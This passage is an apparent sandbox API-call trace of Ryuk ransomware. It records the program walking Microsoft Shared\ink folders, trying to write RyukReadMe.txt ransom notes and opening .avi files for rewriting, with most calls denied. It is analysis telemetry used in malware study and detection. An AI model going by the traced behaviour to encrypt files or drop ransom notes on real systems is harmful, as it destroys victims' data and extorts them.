lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.028] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.028] SetLastError (dwErrCode=0x0) [0161.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.028] GetLastError () returned 0x5 [0161.028] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.029] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.029] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.029] SetLastError (dwErrCode=0x0) [0161.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.029] GetLastError () returned 0x5 [0161.029] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.029] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.029] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.034] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.034] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.034] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.034] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.034] SetLastError (dwErrCode=0x0) [0161.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.034] GetLastError () returned 0x5 [0161.034] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.034] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.034] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.034] SetLastError (dwErrCode=0x0) [0161.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.035] GetLastError () returned 0x5 [0161.035] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.035] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.035] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.035] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.035] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.035] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.035] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.035] SetLastError (dwErrCode=0x0) [0161.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.035] GetLastError () returned 0x5 [0161.035] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.035] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.035] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.035] SetLastError (dwErrCode=0x0) [0161.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.035] GetLastError () returned 0x5 [0161.035] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.035] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.036] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.036] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.036] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.036] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", dwFileAttributes=0x80) returned 0 [0161.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.037] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.037] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.037] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.037] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", dwFileAttributes=0x80) returned 0 [0161.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.037] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.037] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.037] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.037] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", dwFileAttributes=0x80) returned 0 [0161.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.038] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.038] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.038] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.038] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", dwFileAttributes=0x80) returned 0 [0161.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.038] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.038] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.039] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.039] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", dwFileAttributes=0x80) returned 0 [0161.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.039] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.039] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.039] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.039] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", dwFileAttributes=0x80) returned 0 [0161.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.040] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.040] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", dwFileAttributes=0x80) returned 0 [0161.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.040] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.040] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.040] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", dwFileAttributes=0x80) returned 0 [0161.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.041] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.041] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.041] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.262] SetLastError (dwErrCode=0x0) [0161.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.265] GetLastError () returned 0x5 [0161.265] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.265] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.265] SetLastError (dwErrCode=0x0) [0161.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.265] GetLastError () returned 0x5 [0161.265] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.266] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.266] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.266] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.266] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.266] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.266] SetLastError (dwErrCode=0x0) [0161.266] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.266] GetLastError () returned 0x5 [0161.266] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.266] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.266] SetLastError (dwErrCode=0x0) [0161.266] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.266] GetLastError () returned 0x5 [0161.266] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.266] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.267] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.267] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.267] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.267] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.267] SetLastError (dwErrCode=0x0) [0161.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.267] GetLastError () returned 0x5 [0161.267] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.267] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.267] SetLastError (dwErrCode=0x0) [0161.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.267] GetLastError () returned 0x5 [0161.267] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.268] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.268] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.268] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.268] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.268] SetLastError (dwErrCode=0x0) [0161.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.268] GetLastError () returned 0x5 [0161.268] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.268] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", dwFileAttributes=0x80) returned 0 [0161.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.268] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.269] SetLastError (dwErrCode=0x0) [0161.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.269] GetLastError () returned 0x5 [0161.269] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.269] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.269] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.269] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.269] SetLastError (dwErrCode=0x0) [0161.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff 